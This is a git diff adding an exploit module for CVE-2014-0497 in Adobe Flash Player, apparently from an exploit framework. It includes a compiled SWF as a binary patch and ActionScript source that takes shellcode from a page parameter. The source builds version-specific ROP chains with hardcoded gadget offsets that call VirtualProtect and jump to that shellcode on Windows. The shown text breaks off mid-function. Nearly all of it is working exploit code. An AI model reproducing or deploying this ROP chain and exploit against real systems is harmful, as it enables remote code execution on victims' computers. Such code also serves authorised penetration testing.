a/data/exploits/CVE-2014-0497/Vickers.swf b/data/exploits/CVE-2014-0497/Vickers.swf new file mode 100755 index 0000000000000000000000000000000000000000..f0e1ccb1f47f4177f1c68cefdc6f35cbbac0ce3d GIT binary patch literal 3534 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 I5&qXrD#5AhB>(^b literal 0 HcmV?d00001 diff --git a/external/source/exploits/CVE-2014-0497/Vickers.as b/external/source/exploits/CVE-2014-0497/Vickers.as new file mode 100755 index 0000000000..02db79f39e --- /dev/null +++ b/external/source/exploits/CVE-2014-0497/Vickers.as @@ -0,0 +1,797 @@ +//Compile with mxmlc Vickers.as -o Vickers.swf +package +{ + import flash.display.Sprite; + import flash.system.Capabilities; + import flash.utils.ByteArray; + import __AS3__.vec.Vector; + import flash.system.ApplicationDomain; + import avm2.intrinsics.memory.*; + + public class Vickers extends Sprite + { + + public static var shellcode:String; + + public function Vickers() + { + var params = root.loaderInfo.parameters; + shellcode = params["id"]; + while (true) + { + if (exploit()) break; + }; + } + + public function makePayload(vftableAddr:*, scAddr:*):ByteArray + { + var payload = null; + switch (Capabilities.os.toLowerCase()) + { + case "windows xp": + case "windows vista": + case "windows server 2003 r2": + case "windows server 2003": + case "windows 7": + case "windows 7 x64": + case "windows server 2008 r2": + case "windows server 2008": + payload = makePayloadWinOther(vftableAddr, scAddr); + break; + case "windows 8": + case "windows 8 x64": + payload = makePayloadWin8(vftableAddr, scAddr); + break; + default: + return (null); + }; + return (payload); + } + + public function makePayloadWin8(vftableAddr:*, scAddr:*):ByteArray + { + var flash_base:uint = vftableAddr; + var flash_end:uint; + var rop_payload:ByteArray = new ByteArray(); + rop_payload.position = 0; + rop_payload.endian = "littleEndian"; + rop_payload.writeUnsignedInt((scAddr + 4)); + switch (Capabilities.version.toLowerCase()) + { + case "win 11,3,372,94": + flash_base = (flash_base - 9518744); + flash_end = (flash_base + 0xB10000); + rop_payload.writeUnsignedInt((flash_base + 0x401404)); // add esp, 0x44; ret + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 0x26525)); // xchg eax, esp; ret + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 0x10c5)); // pop eax; ret + rop_payload.writeUnsignedInt((flash_base + 0x817420)); // ptr to KERNEL32!VirtualProtectStub + rop_payload.writeUnsignedInt((flash_base + 0x9e16)); // mov eax, dword ptr [eax]; ret + rop_payload.writeUnsignedInt((flash_base + 0xcc022)); // push eax; ret + rop_payload.writeUnsignedInt((flash_base + 0x3157c)); // jmp esp ; ret after VirtualProtect + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(0x40); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,375,10": + flash_base = (flash_base - 9589392); + flash_end = (flash_base + 0xB15000); + rop_payload.writeUnsignedInt((flash_base + 4220004)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 142215)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8504352)); + rop_payload.writeUnsignedInt((flash_base + 40214)); + rop_payload.writeUnsignedInt((flash_base + 840082)); + rop_payload.writeUnsignedInt((flash_base + 202134)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,376,12": + flash_base = (flash_base - 9593552); + flash_end = (flash_base + 0xB16000); + rop_payload.writeUnsignedInt((flash_base + 4220740)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 142023)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8508448)); + rop_payload.writeUnsignedInt((flash_base + 39878)); + rop_payload.writeUnsignedInt((flash_base + 839538)); + rop_payload.writeUnsignedInt((flash_base + 201958)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,377,15": + flash_base = (flash_base - 9589576); + flash_end = (flash_base + 0xB15000); + rop_payload.writeUnsignedInt((flash_base + 4220388)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 141671)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8504352)); + rop_payload.writeUnsignedInt((flash_base + 39526)); + rop_payload.writeUnsignedInt((flash_base + 839698)); + rop_payload.writeUnsignedInt((flash_base + 201590)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,378,5": + flash_base = (flash_base - 9589448); + flash_end = (flash_base + 0xB15000); + rop_payload.writeUnsignedInt((flash_base + 4220388)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 141671)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8504352)); + rop_payload.writeUnsignedInt((flash_base + 39526)); + rop_payload.writeUnsignedInt((flash_base + 839698)); + rop_payload.writeUnsignedInt((flash_base + 201590)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,379,14": + flash_base = (flash_base - 9597856); + flash_end = (flash_base + 0xB17000); + rop_payload.writeUnsignedInt((flash_base + 4575113)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 6617808)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 8149060)); + rop_payload.writeUnsignedInt((flash_base + 8512544)); + rop_payload.writeUnsignedInt((flash_base + 4907562)); + rop_payload.writeUnsignedInt((flash_base + 8147977)); + rop_payload.writeUnsignedInt((flash_base + 4046601)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,167": + flash_base = (flash_base - 9821704); + flash_end = (flash_base + 0xB85000); + rop_payload.writeUnsignedInt((flash_base + 8405950)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 27456)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8791088)); + rop_payload.writeUnsignedInt((flash_base + 73494)); + rop_payload.writeUnsignedInt((flash_base + 1115794)); + rop_payload.writeUnsignedInt((flash_base + 242790)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,171": + flash_base = (flash_base - 9821904); + flash_end = (flash_base + 0xB85000); + rop_payload.writeUnsignedInt((flash_base + 8406414)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 27456)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8791088)); + rop_payload.writeUnsignedInt((flash_base + 73078)); + rop_payload.writeUnsignedInt((flash_base + 1116754)); + rop_payload.writeUnsignedInt((flash_base + 242380)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,180": + flash_base = (flash_base - 9816600); + flash_end = (flash_base + 0xB84000); + rop_payload.writeUnsignedInt((flash_base + 8404478)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 29514)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8786992)); + rop_payload.writeUnsignedInt((flash_base + 69382)); + rop_payload.writeUnsignedInt((flash_base + 175197)); + rop_payload.writeUnsignedInt((flash_base + 238732)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,7,700,169": + flash_base = (flash_base - 10441412); + flash_end = (flash_base + 0xC45000); + rop_payload.writeUnsignedInt((flash_base + 4640769)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 53338)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 9368732)); + rop_payload.writeUnsignedInt((flash_base + 95414)); + rop_payload.writeUnsignedInt((flash_base + 1145506)); + rop_payload.writeUnsignedInt((flash_base + 2156132)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,7,700,202": + flash_base = (flash_base - 0x9f5470); + flash_end = (flash_base + 0xC45000); + rop_payload.writeUnsignedInt((flash_base + 0x46c361)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 0xcc5a)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 0x10c5)); + rop_payload.writeUnsignedInt((flash_base + 0x8ef49c)); + rop_payload.writeUnsignedInt((flash_base + 0x17136)); + rop_payload.writeUnsignedInt((flash_base + 0x42f0)); + rop_payload.writeUnsignedInt((flash_base + 0x40664)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,7,700,224": + flash_base = (flash_base - 10450228); + flash_end = (flash_base + 0xC7A000); + rop_payload.writeUnsignedInt((flash_base + 4646881)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 52090)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 9376924)); + rop_payload.writeUnsignedInt((flash_base + 93510)); + rop_payload.writeUnsignedInt((flash_base + 1145378)); + rop_payload.writeUnsignedInt((flash_base + 1909483)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + default: + return (null); + }; + return (rop_payload); + } + + public function makePayloadWinOther(vftableAddr:*, scAddr:*):ByteArray + { + var vftableAddr_copy:uint = vftableAddr; + var _local_5:uint; + var payload:ByteArray = new ByteArray(); + payload.position = 0; + payload.endian = "littleEndian"; + payload.writeUnsignedInt((scAddr + 4)); + switch (Capabilities.version.toLowerCase()) + { + case "win 11,0,1,152": + vftableAddr_copy = (vftableAddr_copy - 7628676); + _local_5 = (vftableAddr_copy + 0x927000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 1041567)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1937003)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 4585805)); + payload.writeUnsignedInt((vftableAddr_copy + 6697912)); + payload.writeUnsignedInt((vftableAddr_copy + 2201532)); + payload.writeUnsignedInt((vftableAddr_copy + 3985044)); + payload.writeUnsignedInt((vftableAddr_copy + 2764856)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,1,102,55": + vftableAddr_copy = (vftableAddr_copy - 7633040); + _local_5 = (vftableAddr_copy + 0x927000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4793772)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1939267)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 2297101)); + payload.writeUnsignedInt((vftableAddr_copy + 6702008)); + payload.writeUnsignedInt((vftableAddr_copy + 3976335)); + payload.writeUnsignedInt((vftableAddr_copy + 3516263)); + payload.writeUnsignedInt((vftableAddr_copy + 2768033)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,1,102,62": + vftableAddr_copy = (vftableAddr_copy - 7628912); + _local_5 = (vftableAddr_copy + 0x927000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4794156)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1939856)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 5126527)); + payload.writeUnsignedInt((vftableAddr_copy + 6702008)); + payload.writeUnsignedInt((vftableAddr_copy + 2920469)); + payload.writeUnsignedInt((vftableAddr_copy + 4454837)); + payload.writeUnsignedInt((vftableAddr_copy + 2768325)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,1,102,63": + vftableAddr_copy = (vftableAddr_copy - 7628904); + _local_5 = (vftableAddr_copy + 0x927000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4794076)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1939822)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 5126435)); + payload.writeUnsignedInt((vftableAddr_copy + 6702008)); + payload.writeUnsignedInt((vftableAddr_copy + 2353542)); + payload.writeUnsignedInt((vftableAddr_copy + 3516455)); + payload.writeUnsignedInt((vftableAddr_copy + 2768305)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,2,202,228": + vftableAddr_copy = (vftableAddr_copy - 7726032); + _local_5 = (vftableAddr_copy + 0x93F000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4947482)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2022234)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 6255948)); + payload.writeUnsignedInt((vftableAddr_copy + 6824832)); + payload.writeUnsignedInt((vftableAddr_copy + 5021261)); + payload.writeUnsignedInt((vftableAddr_copy + 6176368)); + payload.writeUnsignedInt((vftableAddr_copy + 2847152)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,2,202,233": + vftableAddr_copy = (vftableAddr_copy - 7729872); + _local_5 = (vftableAddr_copy + 0x93F000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4947594)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2022508)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 4691374)); + payload.writeUnsignedInt((vftableAddr_copy + 6824832)); + payload.writeUnsignedInt((vftableAddr_copy + 4164715)); + payload.writeUnsignedInt((vftableAddr_copy + 5837496)); + payload.writeUnsignedInt((vftableAddr_copy + 2847021)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,2,202,235": + vftableAddr_copy = (vftableAddr_copy - 7734032); + _local_5 = (vftableAddr_copy + 0x940000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4947578)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2022729)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 5249755)); + payload.writeUnsignedInt((vftableAddr_copy + 6828928)); + payload.writeUnsignedInt((vftableAddr_copy + 4261382)); + payload.writeUnsignedInt((vftableAddr_copy + 4553024)); + payload.writeUnsignedInt((vftableAddr_copy + 2847456)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,300,257": + vftableAddr_copy = (vftableAddr_copy - 8232016); + _local_5 = (vftableAddr_copy + 0x9C3000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 5328586)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2069614)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 6497300)); + payload.writeUnsignedInt((vftableAddr_copy + 7222148)); + payload.writeUnsignedInt((vftableAddr_copy + 5022322)); + payload.writeUnsignedInt((vftableAddr_copy + 4972967)); + payload.writeUnsignedInt((vftableAddr_copy + 3071572)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,300,273": + vftableAddr_copy = (vftableAddr_copy - 8236216); + _local_5 = (vftableAddr_copy + 0x9C4000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 5331930)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2070667)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 6500737)); + payload.writeUnsignedInt((vftableAddr_copy + 7226252)); + payload.writeUnsignedInt((vftableAddr_copy + 5142060)); + payload.writeUnsignedInt((vftableAddr_copy + 5127634)); + payload.writeUnsignedInt((vftableAddr_copy + 3074828)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,4,402,278": + vftableAddr_copy = (vftableAddr_copy - 8503560); + _local_5 = (vftableAddr_copy + 0xA23000); + payload.writeUnsignedInt((vftableAddr_copy + 5581452)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1202409)); + payload.position = 76; + payload.writeUnsignedInt((vftableAddr_copy + 6927402)); + payload.writeUnsignedInt((vftableAddr_copy + 7480208)); + payload.writeUnsignedInt((vftableAddr_copy + 5373116)); + payload.writeUnsignedInt((vftableAddr_copy + 5713520)); + payload.writeUnsignedInt((vftableAddr_copy + 3269652)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,4,402,287": + vftableAddr_copy = (vftableAddr_copy - 8507728); + _local_5 = (vftableAddr_copy + 0xA24000); + payload.writeUnsignedInt((vftableAddr_copy + 5582348)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1202841)); + payload.position = 76; + payload.writeUnsignedInt((vftableAddr_copy + 6927143)); + payload.writeUnsignedInt((vftableAddr_copy + 7484304)); + payload.writeUnsignedInt((vftableAddr_copy + 5481024)); + payload.writeUnsignedInt((vftableAddr_copy + 5107604)); + payload.writeUnsignedInt((vftableAddr_copy + 5747979)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,5,502,110": + vftableAddr_copy = (vftableAddr_copy - 11716376); + _local_5 = (vftableAddr_copy + 0xEC6000); + payload.position = 20; + payload.writeUnsignedInt((vftableAddr_copy + 9813154)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 448623)); + payload.position = 96; + payload.writeUnsignedInt((vftableAddr_copy + 9326463)); + payload.writeUnsignedInt((vftableAddr_copy + 10691852)); + payload.writeUnsignedInt((vftableAddr_copy + 5731300)); + payload.writeUnsignedInt((vftableAddr_copy + 8910259)); + payload.writeUnsignedInt((vftableAddr_copy + 8630687)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,5,502,135": + vftableAddr_copy = (vftableAddr_copy - 11716400); + _local_5 = (vftableAddr_copy + 0xEC6000); + payload.writeUnsignedInt((vftableAddr_copy + 1101327)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4733912)); + payload.position = 76; + payload.writeUnsignedInt((vftableAddr_copy + 4540)); + payload.writeUnsignedInt((vftableAddr_copy + 10691852)); + payload.writeUnsignedInt((vftableAddr_copy + 28862)); + payload.writeUnsignedInt((vftableAddr_copy + 512197)); + payload.writeUnsignedInt((vftableAddr_copy + 1560889)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,5,502,146": + vftableAddr_copy = (vftableAddr_copy - 11716320); + _local_5 = (vftableAddr_copy + 0xEC6000); + payload.writeUnsignedInt((vftableAddr_copy + 1101327)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4733912)); + payload.position = 76; + payload.writeUnsignedInt((vftableAddr_copy + 4540)); + payload.writeUnsignedInt((vftableAddr_copy + 10691852)); + payload.writeUnsignedInt((vftableAddr_copy + 28862)); + payload.writeUnsignedInt((vftableAddr_copy + 512197)); + payload.writeUnsignedInt((vftableAddr_copy + 1560889)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,5,502,149": + vftableAddr_copy = (vftableAddr_copy - 11712240); + _local_5 = (vftableAddr_copy + 0xEC6000); + payload.position = 5; + payload.writeUnsignedInt((vftableAddr_copy + 10373824)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4331881)); + payload.position = 77; + payload.writeUnsignedInt((vftableAddr_copy + 9292830)); + payload.writeUnsignedInt((vftableAddr_copy + 10691852)); + payload.writeUnsignedInt((vftableAddr_copy + 5731956)); + payload.writeUnsignedInt((vftableAddr_copy + 7150772)); + payload.writeUnsignedInt((vftableAddr_copy + 3344264)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,168": + vftableAddr_copy = (vftableAddr_copy - 11825816); + _local_5 = (vftableAddr_copy + 0xEE9000); + payload.position = 5; + payload.writeUnsignedInt((vftableAddr_copy + 9924439)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4370139)); + payload.position = 77; + payload.writeUnsignedInt((vftableAddr_copy + 9564155)); + payload.writeUnsignedInt((vftableAddr_copy + 10736920)); + payload.writeUnsignedInt((vftableAddr_copy + 5830863)); + payload.writeUnsignedInt((vftableAddr_copy + 9044861)); + payload.writeUnsignedInt((vftableAddr_copy + 7984191)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,171": + vftableAddr_copy = (vftableAddr_copy - 11834040); + _local_5 = (vftableAddr_copy + 0xEEA000); + payload.position = 5; + payload.writeUnsignedInt((vftableAddr_copy + 9925589)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4370636)); + payload.position = 77; + payload.writeUnsignedInt((vftableAddr_copy + 9564442)); + payload.writeUnsignedInt((vftableAddr_copy + 10741016)); + payload.writeUnsignedInt((vftableAddr_copy + 5771380)); + payload.writeUnsignedInt((vftableAddr_copy + 10153408)); + payload.writeUnsignedInt((vftableAddr_copy + 7983199)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,180": + vftableAddr_copy = (vftableAddr_copy - 11824712); + _local_5 = (vftableAddr_copy + 0xEE9000); + payload.position = 5; + payload.writeUnsignedInt((vftableAddr_copy + 9923173)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4368414)); + payload.position = 77; + payload.writeUnsignedInt((vftableAddr_copy + 9562061)); + payload.writeUnsignedInt((vftableAddr_copy + 10736920)); + payload.writeUnsignedInt((vftableAddr_copy + 5828990)); + payload.writeUnsignedInt((vftableAddr_copy + 9042989)); + payload.writeUnsignedInt((vftableAddr_copy + 8661666)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,7,700,169": + vftableAddr_copy = (vftableAddr_copy - 12902952); + _local_5 = (vftableAddr_copy + 16904192); + payload.writeUnsignedInt((vftableAddr_copy + 1116239)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 10368763)); + payload.position = 76; + payload.writeUnsignedInt((vftableAddr_copy + 2586086)); + payload.writeUnsignedInt((vftableAddr_copy + 11752328)); + payload.writeUnsignedInt((vftableAddr_copy + 32732)); + 